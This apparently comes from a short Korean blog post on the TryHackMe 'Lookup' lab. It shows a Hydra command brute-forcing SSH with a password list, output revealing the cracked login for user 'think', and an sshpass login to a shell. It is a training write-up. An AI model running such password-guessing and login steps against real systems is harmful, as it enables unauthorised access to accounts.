Hydra는 브루트포스를 수행하는데 사용되는 툴로 매우 빠르고 FTP, SSH등 여러 프토로콜을 지원한다.
Tryhackme 문제 가운데 Lookup 문제를 푸는 과정에서 hydra를 사용한 기록을 남겨둔다.
$ hydra -l think -P list.txt ssh://lookup.thm
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-23 00:10:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 50 login tries (l:1/p:50), ~4 tries per task
[DATA] attacking ssh://lookup.thm:22/
[22][ssh] host: lookup.thm login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-23 00:11:05
$ sshpass -p "josemario.AKA(think)" ssh [email protected]
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 22 Oct 2025 03:18:45 PM UTC
System load: 0.31 Processes: 129
Usage of /: 63.5% of 9.75GB Users logged in: 0
Memory usage: 29% IPv4 address for ens5: 10.201.55.24
Swap usage: 0%
=> There are 2 zombie processes.
* Ubuntu 20.04 LTS Focal Fossa will reach its end of standard support on 31 May
For more details see:
https://ubuntu.com/20-04
Expanded Security Maintenance for Infrastructure is not enabled.
221 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Wed Oct 22 15:17:50 2025 from 10.21.35.213
think@ip-10-201-55-24:~$
답글 남기기